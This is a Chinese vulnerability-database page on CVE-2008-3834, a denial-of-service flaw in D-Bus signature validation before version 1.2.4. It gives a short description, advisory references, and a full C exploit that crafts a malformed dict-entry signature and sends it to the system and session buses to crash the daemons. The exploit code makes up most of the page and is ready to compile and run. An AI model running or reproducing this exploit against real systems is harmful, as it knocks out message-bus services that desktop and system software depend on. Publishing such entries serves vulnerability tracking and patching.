D-Bus dbus_signature_validate()函数类型签名拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117264 漏洞类型 输入验证
发布时间 2009-01-19 更新时间 2009-03-03
CVE编号 CVE-2008-3834 CNNVD-ID CNNVD-200810-074
漏洞平台 Multiple CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/7822
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-074
|漏洞详情
RedHatD-BUS(也称DBus)是美国红帽(RedHat)公司的一个免费的消息总线模块,它提供了简单应用程序互相通讯的途径,是freedesktop.org项目的一部分。D-BUS的_dbus_validate_signature_with_reason()函数没有正确地验证类型代码,远程攻击者利用畸形的签名信息,将会造成拒绝服务攻击,则将会引发验证声明错误.
|漏洞EXP
/*
 * cve-2008-3834.c
 *
 * D-Bus Daemon Denial of Service < 1.2.4
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Usage:
 *
 *   $ gcc `pkg-config dbus-1 --cflags` cve-2008-3834.c `pkg-config dbus-1 --libs` -o cve-2008-3834
 *   $ ./cve-2008-3834
 *  
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3834
 *
 *   The dbus_signature_validate function in the D-bus library (libdbus) 
 *   before 1.2.4 allows remote attackers to cause a denial of service 
 *   (application abort) via a message containing a malformed signature,
 *   which triggers a failed assertion error. 
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

#include <dbus/dbus.h>

#define DEST "org.freedesktop.ExampleService"
#define NAME "org.freedesktop.ExampleInterface.ExampleMethod"
#define PATH "/org/freedesktop/sample/object/name"
#define SIGNAL "ExampleMethod"

int
main(int argc, char *argv[])
{
	char sig[8];
	uint32_t val = 0xdeadbeef;
	DBusMessage *message;
	DBusConnection *system, *session;
	DBusMessageIter iter1, iter2, iter3, iter4;

	printf("[+] creating malicious dbus message...\n");

	message = dbus_message_new_signal(PATH, NAME, SIGNAL);
	if (!message) {
		printf("[-] error: could not create dbus message\n");
		return 1;
	}
	if (!dbus_message_set_destination(message, DEST)) {
		printf("[-] error: could not create set dbus destination\n");
		return 1;
	}

	sig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR;
	sig[1] = DBUS_STRUCT_BEGIN_CHAR;
	sig[2] = DBUS_TYPE_INT32;
	sig[3] = DBUS_TYPE_INT32;
	sig[4] = DBUS_STRUCT_END_CHAR;
	sig[5] = DBUS_TYPE_INT32;
	sig[6] = DBUS_DICT_ENTRY_END_CHAR;
	sig[7] = '\0';

	dbus_message_iter_init_append(message, &iter1);
	dbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2);
	dbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, NULL, &iter3);
	dbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, NULL, &iter4);
	dbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);
	dbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);
	dbus_message_iter_close_container(&iter3, &iter4);
	dbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val);
	dbus_message_iter_close_container(&iter2, &iter3);
	dbus_message_iter_close_container(&iter1, &iter2);

	printf("[+] connecting to dbus system daemon...\n");

	system = dbus_bus_get(DBUS_BUS_SYSTEM, NULL);

	if (system) {
		printf("[+] killing dbus system daemon...\n");

		dbus_connection_send(system, message, NULL);
		dbus_connection_flush(system);
		dbus_connection_unref(system);
	} else {
		printf("[-] error: could not connect to dbus system daemon\n");
	}

	printf("[+] connecting to dbus session daemon...\n");

	session = dbus_bus_get(DBUS_BUS_SESSION, NULL);

	if (session) {
		printf("[+] killing dbus session daemon...\n");

		dbus_connection_send(session, message, NULL);
		dbus_connection_flush(session);
		dbus_connection_unref(session);
	} else {
		printf("[-] error: could not connect to dbus session daemon\n");
	}

	dbus_message_unref(message);

	return 0;
}

// milw0rm.com [2009-01-19]
|参考资料

来源:FEDORA
名称:FEDORA-2008-8764
链接:https://www.redhat.com/archives/fedora-package-announce/2008-October/msg00298.html
来源:bugzilla.redhat.com
链接:https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2008-3834
来源:bugs.freedesktop.org
链接:https://bugs.freedesktop.org/show_bug.cgi?id=17803
来源:XF
名称:dbus-dbusvalidatesignaturewithreason-dos(45701)
链接:http://xforce.iss.net/xforce/xfdb/45701
来源:UBUNTU
名称:USN-653-1
链接:http://www.ubuntu.com/usn/usn-653-1
来源:SECTRACK
名称:1021063
链接:http://www.securitytracker.com/id?1021063
来源:BID
名称:31602
链接:http://www.securityfocus.com/bid/31602
来源:REDHAT
名称:RHSA-2009:0008
链接:http://www.redhat.com/support/errata/RHSA-2009-0008.html
来源:MILW0RM
名称:7822
链接:http://www.milw0rm.com/exploits/7822
来源:MANDRIVA
名称:MDVSA-2008:213
链接:http://www.mandriva.com/security/advisories?name=MDVSA-2008:213
来源:VUPEN
名称:ADV-2008-2762
链接:http://www.frsirt.com/english/advisories/2008/2762
来源:www.freedesktop.org
链接:http://www.freedesktop.org/wiki/Software/dbus#head-dad0dab297a44f1d7a3b1259cfc06b58